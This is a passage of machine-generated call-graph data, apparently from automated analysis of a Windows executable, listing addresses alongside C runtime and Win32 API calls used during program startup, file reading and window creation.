85223->85226 85227 416e4e GetProcAddress GetProcAddress GetProcAddress GetProcAddress 85223->85227 85331 41177f Sleep GetModuleHandleW 85224->85331 85341 416ad5 70 API calls 2 library calls 85226->85341 85229 416e97 TlsAlloc 85227->85229 85228 416e43 85228->85223 85231 416218 85229->85231 85233 416ee5 TlsSetValue 85229->85233 85231->85192 85324 41616a 67 API calls 3 library calls 85231->85324 85233->85231 85234 416ef6 85233->85234 85332 411a69 6 API calls 4 library calls 85234->85332 85236 416efb 85237 41696e __encode_pointer 6 API calls 85236->85237 85238 416f06 85237->85238 85239 41696e __encode_pointer 6 API calls 85238->85239 85240 416f16 85239->85240 85241 41696e __encode_pointer 6 API calls 85240->85241 85242 416f26 85241->85242 85243 41696e __encode_pointer 6 API calls 85242->85243 85244 416f36 85243->85244 85333 41828b InitializeCriticalSectionAndSpinCount __getstream 85244->85333 85246 416f43 85246->85226 85247 4169e9 __decode_pointer 6 API calls 85246->85247 85248 416f57 85247->85248 85248->85226 85334 416ffb 85248->85334 85251 4169e9 __decode_pointer 6 API calls 85252 416f8a 85251->85252 85252->85226 85253 416f91 85252->85253 85340 416b12 67 API calls 5 library calls 85253->85340 85255 416f99 GetCurrentThreadId 85255->85231 85360 41718c 85256->85360 85258 41b675 GetStartupInfoA 85259 416ffb __calloc_crt 67 API calls 85258->85259 85265 41b696 85259->85265 85260 41b8b4 __setmode 85260->85195 85261 41b831 GetStdHandle 85270 41b7fb 85261->85270 85262 41b896 SetHandleCount 85262->85260 85263 416ffb __calloc_crt 67 API calls 85263->85265 85264 41b843 GetFileType 85264->85270 85265->85260 85265->85263 85266 41b77e 85265->85266 85265->85270 85266->85260 85267 41b7a7 GetFileType 85266->85267 85266->85270 85361 4189e6 InitializeCriticalSectionAndSpinCount __setmode 85266->85361 85267->85266 85270->85260 85270->85261 85270->85262 85270->85264 85362 4189e6 InitializeCriticalSectionAndSpinCount __setmode 85270->85362 85272 422370 85271->85272 85273 422374 85271->85273 85272->85200 85274 416fb6 __malloc_crt 67 API calls 85273->85274 85275 422395 _memcpy_s 85274->85275 85276 42239c FreeEnvironmentStringsW 85275->85276 85276->85200 85278 4222e6 _wparse_cmdline 85277->85278 85279 416fb6 __malloc_crt 67 API calls 85278->85279 85280 422329 _wparse_cmdline 85278->85280 85279->85280 85280->85202 85282 42209a _wcslen 85281->85282 85286 416267 85281->85286 85283 416ffb __calloc_crt 67 API calls 85282->85283 85289 4220be _wcslen 85283->85289 85284 422123 85285 413a88 __fcloseall 67 API calls 85284->85285 85285->85286 85286->85207 85327 4117af 67 API calls 3 library calls 85286->85327 85287 416ffb __calloc_crt 67 API calls 85287->85289 85288 422149 85290 413a88 __fcloseall 67 API calls 85288->85290 85289->85284 85289->85286 85289->85287 85289->85288 85292 422108 85289->85292 85363 426349 67 API calls __setmode 85289->85363 85290->85286 85292->85289 85364 417d93 10 API calls 3 library calls 85292->85364 85295 41187c __IsNonwritableInCurrentImage 85294->85295 85365 418486 85295->85365 85297 41189a __initterm_e 85298 411421 __cinit 74 API calls 85297->85298 85299 4118b9 __IsNonwritableInCurrentImage __initterm 85297->85299 85298->85299 85299->85210 85301 431bcb 85300->85301 85302 40d80c 85300->85302 85303 4092c0 VariantClear 85302->85303 85304 40d847 85303->85304 85369 40eb50 85304->85369 85307 40d877 85372 411ac6 67 API calls 4 library calls 85307->85372 85310 40d888 85373 411b24 67 API calls __setmode 85310->85373 85312 40d891 85374 40f370 SystemParametersInfoW SystemParametersInfoW 85312->85374 85314 40d89f 85375 40d6d0 GetCurrentDirectoryW 85314->85375 85316 40d8a7 SystemParametersInfoW 85317 40d8d4 85316->85317 85318 40d8cd FreeLibrary 85316->85318 85319 4092c0 VariantClear 85317->85319 85318->85317 85320 40d8dd 85319->85320 85321 4092c0 VariantClear 85320->85321 85322 40d8e6 85321->85322 85322->85215 85329 411a1f 67 API calls _doexit 85322->85329 85323->85188 85324->85192 85325->85199 85326->85203 85327->85207 85328->85212 85329->85215 85330->85218 85331->85228 85332->85236 85333->85246 85337 417004 85334->85337 85336 416f70 85336->85226 85336->85251 85337->85336 85338 417022 Sleep 85337->85338 85342 422452 85337->85342 85339 417037 85338->85339 85339->85336 85339->85337 85340->85255 85341->85231 85343 42245e __setmode 85342->85343 85344 422476 85343->85344 85354 422495 _memset 85343->85354 85355 417f23 67 API calls __getptd_noexit 85344->85355 85346 42247b 85356 417ebb 6 API calls 2 library calls 85346->85356 85348 422507 HeapAlloc 85348->85354 85350 418407 __lock 66 API calls 85350->85354 85351 42248b __setmode 85351->85337 85354->85348 85354->85350 85354->85351 85357 41a74c 5 API calls 2 library calls 85354->85357 85358 42254e LeaveCriticalSection _doexit 85354->85358 85359 411afc 6 API calls __decode_pointer 85354->85359 85355->85346 85357->85354 85358->85354 85359->85354 85360->85258 85361->85266 85362->85270 85363->85289 85364->85292 85367 41848c 85365->85367 85366 41696e __encode_pointer 6 API calls 85366->85367 85367->85366 85368 4184a4 85367->85368 85368->85297 85413 40eb70 85369->85413 85372->85310 85373->85312 85374->85314 85417 401f80 85375->85417 85377 40d6f1 IsDebuggerPresent 85378 431a9d MessageBoxA 85377->85378 85379 40d6ff 85377->85379 85380 431ab6 85378->85380 85379->85380 85381 40d71f 85379->85381 85510 403e90 75 API calls 3 library calls 85380->85510 85487 40f3b0 85381->85487 85385 40d73a GetFullPathNameW 85507 401440 127 API calls _wcscat 85385->85507 85387 40d77a 85388 40d782 85387->85388 85390 431b09 SetCurrentDirectoryW 85387->85390 85389 40d78b 85388->85389 85511 43604b 6 API calls 85388->85511 85499 4101f0 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 85389->85499 85390->85388 85393 431b28 85393->85389 85395 431b30 GetModuleFileNameW 85393->85395 85397 431ba4 GetForegroundWindow ShellExecuteW 85395->85397 85398 431b4c 85395->85398 85401 40d7c7 85397->85401 85512 401b70 85398->85512 85399 40d795 85404 40d7a8 85399->85404 85508 40e1e0 97 API calls _memset 85399->85508 85405 40d7d1 SetCurrentDirectoryW 85401->85405 85404->85401 85509 401000 Shell_NotifyIconW _memset 85404->85509 85405->85316 85407 431b66 85519 40d3b0 75 API calls 2 library calls 85407->85519 85410 431b72 GetForegroundWindow ShellExecuteW 85411 431b9f 85410->85411 85411->85401 85412 40eba0 LoadLibraryA GetProcAddress 85412->85307 85414 40d86e 85413->85414 85415 40eb76 LoadLibraryA 85413->85415 85414->85307 85414->85412 85415->85414 85416 40eb87 GetProcAddress 85415->85416 85416->85414 85520 40e680 75 API calls 85417->85520 85419 401f90 85521 402940 75 API calls __write_nolock 85419->85521 85421 401fa2 GetModuleFileNameW 85522 40ff90 85421->85522 85423 401fbd 85534 4107b0 75 API calls 85423->85534 85425 401fd6 85426 401b70 75 API calls 85425->85426 85427 401fe4 85426->85427 85535 4019e0 76 API calls 85427->85535 85429 401ff2 85430 4092c0 VariantClear 85429->85430 85431 402002 85430->85431 85432 401b70 75 API calls 85431->85432 85433 40201c 85432->85433 85536 4019e0 76 API calls 85433->85536 85435 40202c 85436 401b70 75 API calls 85435->85436 85437 40203c 85436->85437 85537 40c3e0 75 API calls 85437->85537 85439 40204d 85538 40c060 85439->85538 85443 40206e 85544 4115d0 79 API calls 2 library calls 85443->85544 85445 40207d 85446 42c174 85445->85446 85447 402088 85445->85447 85555 401a70 75 API calls 85446->85555 85545 4115d0 79 API calls 2 library calls 85447->85545 85450 402093 85451 42c189 85450->85451 85452 40209e 85450->85452 85556 401a70 75 API calls 85451->85556 85546 4115d0 79 API calls 2 library calls 85452->85546 85455 42c1a7 85457 42c1b0 GetModuleFileNameW 85455->85457 85456 4020a9 85456->85457 85458 4020b4 85456->85458 85557 401a70 75 API calls 85457->85557 85547 4115d0 79 API calls 2 library calls 85458->85547 85461 4020bf 85463 402107 85461->85463 85466 42c20a _wcscpy 85461->85466 85548 401a70 75 API calls 85461->85548 85462 42c1e2 85558 40df50 75 API calls 85462->85558 85465 402119 85463->85465 85463->85466 85468 42c243 85465->85468 85550 40e7e0 76 API calls 85465->85550 85560 401a70 75 API calls 85466->85560 85467 42c1f1 85559 401a70 75 API calls 85467->85559 85472 4020e5 _wcscpy 85549 401a70 75 API calls 85472->85549 85473 42c201 85473->85466 85475 402132 85551 40d030 76 API calls 85475->85551 85477 40213e 85479 4092c0 VariantClear 85477->85479 85482 402148 85479->85482 85480 402184 85484 4092c0 VariantClear 85480->85484 85482->85480 85552 40d030 76 API calls 85482->85552 85553 40e640 76 API calls 85482->85553 85554 401a70 75 API calls 85482->85554 85486 402196 ctype 85484->85486 85486->85377 85488 42ccf4 _memset 85487->85488 85489 40f3c9 85487->85489 85492 42cd05 GetOpenFileNameW 85488->85492 86220 40ffb0 76 API calls ctype 85489->86220 85491 40f3d2 86221 410130 SHGetMalloc 85491->86221 85492->85489 85494 40d732 85492->85494 85494->85385 85494->85387 85495 40f3d9 86226 410020 88 API calls __wcsicoll 85495->86226 85497 40f3e7 86227 40f400 85497->86227 85500 42b9d3 85499->85500 85501 41025a LoadImageW RegisterClassExW 85499->85501 86281 443e8f EnumResourceNamesW LoadImageW 85500->86281 86280 4102f0 7 API calls 85501->86280 85504 40d790 85506 4103e0 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 85504->85506 85505 42b9da 85506->85399 85507->85387 85508->85404 85509->85401 85510->85387 85511->85393 85513 401b76 _wcslen 85512->85513 85514 41171a 75 API calls 85513->85514 85517 401bc5 85513->85517 85515 401bad _memcpy_s 85514->85515 85516 41171a 75 API calls 85515->85516 85516->85517 85518 40d3b0 75 API calls 2 library calls 85517->85518 85518->85407 85519->85410 85520->85419 85521->85421 85561 40f5e0 85522->85561 85525 40ffa6 85525->85423 85527 42b6d8 85530 42b6e6 85527->85530 85617 434fe1 85527->85617 85529 413a88 __fcloseall 67 API calls 85531 42b6f5 85529->85531 85530->85529 85532 434fe1 106 API calls 85531->85532 85533 42b702 85532->85533 85533->85423 85534->85425 85535->85429 85536->85435 85537->85439 85539 41171a 75 API calls 85538->85539 85540 40c088 85539->85540 85541 41171a 75 API calls 85540->85541 85542 402061 85541->85542 85543 401a70 75 API calls 85542->85543 85543->85443 85544->85445 85545->85450 85546->85456 85547->85461 85548->85472 85549->85463 85550->85475 85551->85477 85552->85482 85553->85482 85554->85482 85555->85451 85556->85455 85557->85462 85558->85467 85559->85473 85560->85482 85621 40f580 85561->85621 85563 40f5f8 _strcat ctype 85629 40f6d0 85563->85629 85568 42b2ee 85658 4151b0 85568->85658 85570 40f679 85570->85568 85571 40f681 85570->85571 85645 414e94 85571->85645 85576 40f68b 85576->85525 85580 452574 85576->85580 85577 42b31d 85664 415484 85577->85664 85579 42b33d 85581 41557c _fseek 105 API calls 85580->85581 85582 4525df 85581->85582 86165 4523ce 85582->86165 85585 4525fc 85585->85527 85586 4151b0 __fread_nolock 81 API calls 85587 45261d 85586->85587 85588 4151b0 __fread_nolock 81 API calls 85587->85588 85589 45262e 85588->85589 85590 4151b0 __fread_nolock 81 API calls 85589->85590 85591 452649 85590->85591 85592 4151b0 __fread_nolock 81 API calls 85591->85592 85593 452666 85592->85593 85594 41557c _fseek 105 API calls 85593->85594 85595 452682 85594->85595 85596 4138ba _malloc 67 API calls 85595->85596 85597 45268e 85596->85597 85598 4138ba _malloc 67 API calls 85597->85598 85599 45269b 85598->85599 85600 4151b0 __fread_nolock 81 API calls 85599->85600 85601 4526ac 85600->85601 85602 44afdc GetSystemTimeAsFileTime 85601->85602 85603 4526bf 85602->85603 85604 4526d5 85603->85604 85605 4526fd 85603->85605 85606 413a88 __fcloseall 67 API calls 85604->85606 85607 452704 85605->85607 85608 45275b 85605->85608 85609 4526df 85606->85609 86171 44b195 85607->86171 85611 413a88 __fcloseall 67 API calls 85608->85611 85613 413a88 __fcloseall 67 API calls 85609->85613 85612 452759 85611->85612 85612->85527 85615 4526e8 85613->85615 85614 452753 85616 413a88 __fcloseall 67 API calls 85614->85616 85615->85527 85616->85612 85618 434ff1 85617->85618 85619 434feb 85617->85619 85618->85530 85620 414e94 __fcloseall 106 API calls 85619->85620 85620->85618 85622 429440 85621->85622 85623 40f589 _wcslen 85621->85623 85624 40f58f WideCharToMultiByte 85623->85624 85625 40f5d8 85624->85625 85626 40f5ad 85624->85626 85625->85563 85627 41171a 75 API calls 85626->85627 85628 40f5bb WideCharToMultiByte 85627->85628 85628->85563 85630 40f6dd _strlen 85629->85630 85677 40f790 85630->85677 85633 414e06 85696 414d40 85633->85696 85635 40f666 85635->85568 85636 40f450 85635->85636 85640 40f45a _strcat _memcpy_s __write_nolock 85636->85640 85637 4151b0 __fread_nolock 81 API calls 85637->85640 85639 42936d 85641 41557c _fseek 105 API calls 85639->85641 85640->85637 85640->85639 85644 40f531 85640->85644 85779 41557c 85640->85779 85642 429394 85641->85642 85643 4151b0 __fread_nolock 81 API calls 85642->85643 85643->85644 85644->85570 85646 414ea0 __setmode 85645->85646 85647 414ed1 85646->85647 85648 414eb4 85646->85648 85651 415965 __lock_file 68 API calls 85647->85651 85654 414ec9 __setmode 85647->85654 85918 417f23 67 API calls __getptd_noexit 85648->85918 85650 414eb9 85919 417ebb 6 API calls 2 library calls 85650->85919 85653 414ee9 85651->85653 85902 414e1d 85653->85902 85654->85576 85987 41511a 85658->85987 85660 4151c8 85661 44afdc 85660->85661 86158 4431e0 85661->86158 85663 44affd 85663->85577 85665 415490 __setmode 85664->85665 85666 4154bb 85665->85666 85667 41549e 85665->85667 85669 415965 __lock_file 68 API calls 85666->85669 86162 417f23 67 API calls __getptd_noexit 85667->86162 85671 4154c3 85669->85671 85670 4154a3 86163 417ebb 6 API calls 2 library calls 85670->86163 85673 4152e7 __ftell_nolock 71 API calls 85671->85673 85674 4154cf 85673->85674 86164 4154e8 LeaveCriticalSection LeaveCriticalSection _ftell 85674->86164 85676 4154b3 __setmode 85676->85579 85678 40f7ae _memset 85677->85678 85680 40f628 85678->85680 85681 415258 85678->85681 85680->85633 85682 415285 85681->85682 85683 415268 85681->85683 85682->85683 85684 41528c 85682->85684 85692 417f23 67 API calls __getptd_noexit 85683->85692 85694 41c551 103 API calls 14 library calls 85684->85694 85687 41526d 85693 417ebb 6 API calls 2 library calls 85687->85693 85688 4152b2 85690 41527d 85688->85690 85695 4191c9 101 API calls 6 library calls 85688->85695 85690->85678 85692->85687 85694->85688 85695->85690 85697 414d4c __setmode 85696->85697 85698 414d5f 85697->85698 85700 414d95 85697->85700 85748 417f23 67 API calls __getptd_noexit 85698->85748 85715 41e28c 85700->85715 85701 414d64 85749 417ebb 6 API calls 2 library calls 85701->85749 85704 414d9a 85705 414da1 85704->85705 85706 414dae 85704->85706 85750 417f23 67 API calls __getptd_noexit 85705->85750 85708 414dd6 85706->85708 85709 414db6 85706->85709 85733 41dfd8 85708->85733 85751 417f23 67 API calls __getptd_noexit 85709->85751 85713 414d74 @_EH4_CallFilterFunc@8 __setmode 85713->85635 85716 41e298 __setmode 85715->85716 85717 418407 __lock 67 API calls 85716->85717 85718 41e2a6 85717->85718 85719 41e322 85718->85719 85723 418344 __mtinitlocknum 67 API calls 85718->85723 85730 41e31b 85718->85730 85756 4159a6 68 API calls __lock 85718->85756 85757 415a14 LeaveCriticalSection LeaveCriticalSection _doexit 85718->85757 85721 416fb6 __malloc_crt 67 API calls 85719->85721 85722 41e32c 85721->85722 85722->85730 85758 4189e6 InitializeCriticalSectionAndSpinCount __setmode 85722->85758 85723->85718 85725 41e3b0 __setmode 85725->85704 85727 41e351 85728 41e35c 85727->85728 85729 41e36f EnterCriticalSection 85727->85729 85731 413a88 __fcloseall 67 API calls 85728->85731 85729->85730 85753 41e3bb 85730->85753 85731->85730 85742 41dffb __wopenfile 85733->85742 85734 41e015 85763 417f23 67 API calls __getptd_noexit 85734->85763 85736 41e1e9 85736->85734 85739 41e247 85736->85739 85737 41e01a 85764 417ebb 6 API calls 2 library calls 85737->85764 85760 425db0 85739->85760 85742->85734 85742->85736 85765 4136bc 79 API calls 2 library calls 85742->85765 85744 41e1e2 85744->85736 85766 4136bc 79 API calls 2 library calls 85744->85766 85746 41e201 85746->85736 85767 4136bc 79 API calls 2 library calls 85746->85767 85748->85701 85750->85713 85751->85713 85752 414dfc LeaveCriticalSection LeaveCriticalSection _ftell 85752->85713 85759 41832d LeaveCriticalSection 85753->85759 85755 41e3c2 85755->85725 85756->85718 85757->85718 85758->85727 85759->85755 85768 425ce4 85760->85768 85762 414de1 85762->85752 85763->85737 85765->85744 85766->85746 85767->85736 85770 425cf0 __setmode 85768->85770 85769 425d03 85771 417f23 __setmode 67 API calls 85769->85771 85770->85769 85773 425d41 85770->85773 85772 425d08 85771->85772 85774 417ebb __setmode 6 API calls 85772->85774 85775 4255c4 __tsopen_nolock 132 API calls 85773->85775 85778 425d17 __setmode 85774->85778 85776 425d5b 85775->85776 85777 425d82 __sopen_helper LeaveCriticalSection 85776->85777 85777->85778 85778->85762 85783 415588 __setmode 85779->85783 85780 415596 85810 417f23 67 API calls __getptd_noexit 85780->85810 85782 4155c4 85792 415965 85782->85792 85783->85780 85783->85782 85784 41559b 85811 417ebb 6 API calls 2 library calls 85784->85811 85791 4155ab __setmode 85791->85640 85793 415977 85792->85793 85794 415999 EnterCriticalSection 85792->85794 85793->85794 85795 41597f 85793->85795 85797 4155cc 85794->85797 85796 418407 __lock 67 API calls 85795->85796 85796->85797 85798 4154f2 85797->85798 85799 415512 85798->85799 85800 415502 85798->85800 85802 415524 85799->85802 85813 4152e7 85799->85813 85867 417f23 67 API calls __getptd_noexit 85800->85867 85830 41486c 85802->85830 85804 415507 85812 4155f7 LeaveCriticalSection LeaveCriticalSection _ftell 85804->85812 85810->85784 85812->85791 85814 41531a 85813->85814 85815 4152fa 85813->85815 85816 41453a __fileno 67 API calls 85814->85816 85868 417f23 67 API calls __getptd_noexit 85815->85868 85818 415320 85816->85818 85821 41efd4 __locking 71 API calls 85818->85821 85819 4152ff 85869 417ebb 6 API calls 2 library calls 85819->85869 85822 415335 85821->85822 85823 4153a9 85822->85823 85825 415364 85822->85825 85829 41530f 85822->85829 85870 417f23 67 API calls __getptd_noexit 85823->85870 85826 41efd4 __locking 71 API calls 85825->85826 85825->85829 85827 415404 85826->85827 85828 41efd4 __locking 71 API calls 85827->85828 85827->85829 85828->85829 85829->85802 85831 414885 85830->85831 85835 4148a7 85830->85835 85832 41453a __fileno 67 API calls 85831->85832 85831->85835 85833 4148a0 85832->85833 85871 41c3cf 101 API calls 5 library calls 85833->85871 85836 41453a 85835->85836 85837 414549 85836->85837 85841 41455e 85836->85841 85872 417f23 67 API calls __getptd_noexit 85837->85872 85839 41454e 85873 417ebb 6 API calls 2 library calls 85839->85873 85842 41efd4 85841->85842 85843 41efe0 __setmode 85842->85843 85844 41f003 85843->85844 85845 41efe8 85843->85845 85846 41f011 85844->85846 85851 41f052 85844->85851 85894 417f36 67 API calls __getptd_noexit 85845->85894 85896 417f36 67 API calls __getptd_noexit 85846->85896 85849 41efed 85895 417f23 67 API calls __getptd_noexit 85849->85895 85850 41f016 85897 417f23 67 API calls __getptd_noexit 85850->85897 85874 41ba3b 85851->85874 85855 41f01d 85898 417ebb 6 API calls 2 library calls 85855->85898 85856 41f058 85858 41f065 85856->85858 85859 41f07b 85856->85859 85884 41ef5f 85858->85884 85899 417f23 67 API calls __getptd_noexit 85859->85899 85861 41eff5 __setmode 85861->85804 85863 41f080 85900 417f36 67 API calls __getptd_noexit 85863->85900 85864 41f073 85901 41f0a6 LeaveCriticalSection __unlock_fhandle 85864->85901 85867->85804 85868->85819 85870->85829 85871->85835 85872->85839 85875 41ba47 __setmode 85874->85875 85876 41baa2 85875->85876 85877 418407 __lock 67 API calls 85875->85877 85878 41bac4 __setmode 85876->85878 85879 41baa7 EnterCriticalSection 85876->85879 85880 41ba73 85877->85880 85878->85856 85879->85878 85881 41ba8a 85880->85881 85882 4189e6 __getstream InitializeCriticalSectionAndSpinCount 85880->85882 85883 41bad2 ___lock_fhandle LeaveCriticalSection 85881->85883 85882->85881 85883->85876 85885 41b9c4 __commit 67 API calls 85884->85885 85886 41ef6e 85885->85886 85887 41ef84 SetFilePointer 85886->85887 85888 41ef74 85886->85888 85890 41efa3 85887->85890 85891 41ef9b GetLastError 85887->85891 85889 417f23 __setmode 67 API calls 85888->85889 85893 41ef79 85889->85893 85892 417f49 __dosmaperr 67 API calls 85890->85892 85890->85893 85891->85890 85892->85893 85893->85864 85894->85849 85895->85861 85896->85850 85897->85855 85899->85863 85900->85864 85901->85861 85903 414e31 85902->85903 85904 414e4d 85902->85904 85948 417f23 67 API calls __getptd_noexit 85903->85948 85907 414e46 85904->85907 85908 41486c __flush 101 API calls 85904->85908 85906 414e36 85949 417ebb 6 API calls 2 library calls 85906->85949 85920 414f08 LeaveCriticalSection LeaveCriticalSection _ftell 85907->85920 85910 414e59 85908->85910 85921 41e680 85910->85921 85913 41453a __fileno 67 API calls 85914 414e67 85913->85914 85925 41e5b3 85914->85925 85916 414e6d 85916->85907 85917 413a88 __fcloseall 67 API calls 85916->85917 85917->85907 85918->85650 85920->85654 85922 41e690 85921->85922 85923 414e61 85921->85923 85922->85923 85924 413a88 __fcloseall 67 API calls 85922->85924 85923->85913 85924->85923 85926 41e5bf __setmode 85925->85926 85927 41e5e2 85926->85927 85928 41e5c7 85926->85928 85929 41e5f0 85927->85929 85935 41e631 85927->85935 85965 417f36 67 API calls __getptd_noexit 85928->85965 85967 417f36 67 API calls __getptd_noexit 85929->85967 85931 41e5cc 85966 417f23 67 API calls __getptd_noexit 85931->85966 85934 41e5f5 85968 417f23 67 API calls __getptd_noexit 85934->85968 85937 41ba3b ___lock_fhandle 68 API calls 85935->85937 85938 41e637 85937->85938 85940 41e652 85938->85940 85941 41e644 85938->85941 85939 41e5fc 85969 417ebb 6 API calls 2 library calls 85939->85969 85970 417f23 67 API calls __getptd_noexit 85940->85970 85950 41e517 85941->85950 85945 41e64c 85971 41e676 LeaveCriticalSection __unlock_fhandle 85945->85971 85946 41e5d4 __setmode 85946->85916 85948->85906 85972 41b9c4 85950->85972 85952 41e57d 85985 41b93e 68 API calls 2 library calls 85952->85985 85953 41e55b 85953->85952 85957 41b9c4 __commit 67 API calls 85953->85957 85954 41e527 85954->85952 85954->85953 85956 41b9c4 __commit 67 API calls 85954->85956 85959 41e552 85956->85959 85960 41e567 CloseHandle 85957->85960 85958 41e585 85961 41e5a7 85958->85961 85986 417f49 67 API calls 3 library calls 85958->85986 85962 41b9c4 __commit 67 API calls 85959->85962 85960->85952 85963 41e573 GetLastError 85960->85963 85961->85945 85962->85953 85963->85952 85965->85931 85966->85946 85967->85934 85968->85939 85970->85945 85971->85946 85973 41b9d1 85972->85973 85974 41b9e9 85972->85974 85975 417f36 __read 67 API calls 85973->85975 85976 417f36 __read 67 API calls 85974->85976 85984 41ba2e 85974->85984 85977 41b9d6 85975->85977 85978 41ba17 85976->85978 85979 417f23 __setmode 67 API calls 85977->85979 85980 417f23 __setmode 67 API calls 85978->85980 85981 41b9de 85979->85981 85982 41ba1e 85980->85982 85981->85954 85983 417ebb __setmode 6 API calls 85982->85983 85983->85984 85984->85954 85985->85958 85986->85961 85988 415126 __setmode 85987->85988 85989 41513a _memset 85988->85989 85990 41516f 85988->85990 85991 415164 __setmode 85988->85991 86016 417f23 67 API calls __getptd_noexit 85989->86016 85992 415965 __lock_file 68 API calls 85990->85992 85991->85660 85994 415177 85992->85994 86000 414f10 85994->86000 85995 415154 86017 417ebb 6 API calls 2 library calls 85995->86017 86001 414f4c 86000->86001 86003 414f2e _memset 86000->86003 86018 4151a6 LeaveCriticalSection LeaveCriticalSection _ftell 86001->86018 86002 414f37 86069 417f23 67 API calls __getptd_noexit 86002->86069 86003->86001 86003->86002 86007 414f8b 86003->86007 86007->86001 86008 4150a9 _memset 86007->86008 86009 41453a __fileno 67 API calls 86007->86009 86015 4150d5 _memset 86007->86015 86019 41ed9e 86007->86019 86049 41e6b1 86007->86049 86071 41ee9b 67 API calls 3 library calls 86007->86071 86072 417f23 67 API calls __getptd_noexit 86008->86072 86009->86007 86014 414f3c 86070 417ebb 6 API calls 2 library calls 86014->86070 86073 417f23 67 API calls __getptd_noexit 86015->86073 86016->85995 86018->85991 86020 41edaa __setmode 86019->86020 86021 41edb2 86020->86021 86022 41edcd 86020->86022 86143 417f36 67 API calls __getptd_noexit 86021->86143 86024 41eddb 86022->86024 86028 41ee1c 86022->86028 86145 417f36 67 API calls __getptd_noexit 86024->86145 86026 41edb7 86144 417f23 67 API calls __getptd_noexit 86026->86144 86027 41ede0 86146 417f23 67 API calls __getptd_noexit 86027->86146 86031 41ee29 86028->86031 86032 41ee3d 86028->86032 86148 417f36 67 API calls __getptd_noexit 86031->86148 86033 41ba3b ___lock_fhandle 68 API calls 86032->86033 86036 41ee43 86033->86036 86034 41ede7 86147 417ebb 6 API calls 2 library calls 86034->86147 86038 41ee50 86036->86038 86039 41ee66 86036->86039 86037 41ee2e 86149 417f23 67 API calls __getptd_noexit 86037->86149 86074 41e7dc 86038->86074 86150 417f23 67 API calls __getptd_noexit 86039->86150 86042 41edbf __setmode 86042->86007 86045 41ee5e 86152 41ee91 LeaveCriticalSection __unlock_fhandle 86045->86152 86046 41ee6b 86151 417f36 67 API calls __getptd_noexit 86046->86151 86050 41e6c1 86049->86050 86055 41e6de 86049->86055 86156 417f23 67 API calls __getptd_noexit 86050->86156 86052 41e6d6 86052->86007 86053 41e6c6 86157 417ebb 6 API calls 2 library calls 86053->86157 86055->86052 86056 41e713 86055->86056 86153 423600 86055->86153 86058 41453a __fileno 67 API calls 86056->86058 86059 41e727 86058->86059 86060 41ed9e __read 79 API calls 86059->86060 86061 41e72e 86060->86061 86061->86052 86062 41453a __fileno 67 API calls 86061->86062 86063 41e751 86062->86063 86063->86052 86064 41453a __fileno 67 API calls 86063->86064 86065 41e75d 86064->86065 86065->86052 86066 41453a __fileno 67 API calls 86065->86066 86067 41e769 86066->86067 86068 41453a __fileno 67 API calls 86067->86068 86068->86052 86069->86014 86071->86007 86072->86014 86073->86014 86075 41e813 86074->86075 86076 41e7f8 86074->86076 86077 41e822 86075->86077 86079 41e849 86075->86079 86078 417f36 __read 67 API calls 86076->86078 86080 417f36 __read 67 API calls 86077->86080 86081 41e7fd 86078->86081 86083 41e868 86079->86083 86094 41e87c 86079->86094 86082 41e827 86080->86082 86084 417f23 __setmode 67 API calls 86081->86084 86085 417f23 __setmode 67 API calls 86082->86085 86086 417f36 __read 67 API calls 86083->86086 86095 41e805 86084->86095 86088 41e82e 86085->86088 86090 41e86d 86086->86090 86087 41e8d4 86089 417f36 __read 67 API calls 86087->86089 86091 417ebb __setmode 6 API calls 86088->86091 86092 41e8d9 86089->86092 86093 417f23 __setmode 67 API calls 86090->86093 86091->86095 86096 417f23 __setmode 67 API calls 86092->86096 86097 41e874 86093->86097 86094->86087 86094->86095 86098 41e8b0 86094->86098 86099 41e8f5 86094->86099 86095->86045 86096->86097 86100 417ebb __setmode 6 API calls 86097->86100 86098->86087 86103 41e8bb ReadFile 86098->86103 86101 416fb6 __malloc_crt 67 API calls 86099->86101 86100->86095 86104 41e90b 86101->86104 86105 41ed62 GetLastError 86103->86105 86106 41e9e7 86103->86106 86109 41e931 86104->86109 86110 41e913 86104->86110 86107 41ebe8 86105->86107 86108 41ed6f 86105->86108 86106->86105 86113 41e9fb 86106->86113 86117 417f49 __dosmaperr 67 API calls 86107->86117 86138 41eb6d 86107->86138 86111 417f23 __setmode 67 API calls 86108->86111 86114 423462 __lseeki64_nolock 69 API calls 86109->86114 86112 417f23 __setmode 67 API calls 86110->86112 86115 41ed74 86111->86115 86116 41e918 86112->86116 86121 41ea17 86113->86121 86122 41ec2d 86113->86122 86113->86138 86118 41e93d 86114->86118 86119 417f36 __read 67 API calls 86115->86119 86120 417f36 __read 67 API calls 86116->86120 86117->86138 86118->86103 86119->86138 86120->86095 86124 41ea7d ReadFile 86121->86124 86130 41eafa 86121->86130 86125 41eca5 ReadFile 86122->86125 86122->86138 86123 413a88 __fcloseall 67 API calls 86123->86095 86127 41ea9b GetLastError 86124->86127 86133 41eaa5 86124->86133 86128 41ecc4 GetLastError 86125->86128 86134 41ecce 86125->86134 86126 41ebbe MultiByteToWideChar 86129 41ebe2 GetLastError 86126->86129 86126->86138 86127->86121 86127->86133 86128->86122 86128->86134 86129->86107 86131 41eb75 86130->86131 86132 41eb68 86130->86132 86130->86138 86139 41eb32 86130->86139 86131->86139 86140 41ebac 86131->86140 86135 417f23 __setmode 67 API calls 86132->86135 86133->86121 86136 423462 __lseeki64_nolock 69 API calls 86133->86136 86134->86122 86137 423462 __lseeki64_nolock 69 API calls 86134->86137 86135->86138 86136->86133 86137->86134 86138->86095 86138->86123 86139->86126 86141 423462 __lseeki64_nolock 69 API calls 86140->86141 86142 41ebbb 86141->86142 86142->86126 86143->86026 86144->86042 86145->86027 86146->86034 86148->86037 86149->86034 86150->86046 86151->86045 86152->86042 86154 416fb6 __malloc_crt 67 API calls 86153->86154 86155 423615 86154->86155 86155->86056 86156->86053 86161 414cef GetSystemTimeAsFileTime __aulldiv 86158->86161 86160 4431ef 86160->85663 86161->86160 86162->85670 86164->85676 86169 4523e1 _wcscpy 86165->86169 86166 4151b0 81 API calls __fread_nolock 86166->86169 86167 44afdc GetSystemTimeAsFileTime 86167->86169 86168 452553 86168->85585 86168->85586 86169->86166 86169->86167 86169->86168 86170 41557c 105 API calls _fseek 86169->86170 86170->86169 86172 44b1b4 86171->86172 86173 44b1a6 86171->86173 86175 44b1ca 86172->86175 86176 44b1c2 86172->86176 86177 414e06 138 API calls 86172->86177 86174 414e06 138 API calls 86173->86174 86174->86172 86206 4352d1 81 API calls 2 library calls 86175->86206 86176->85614 86178 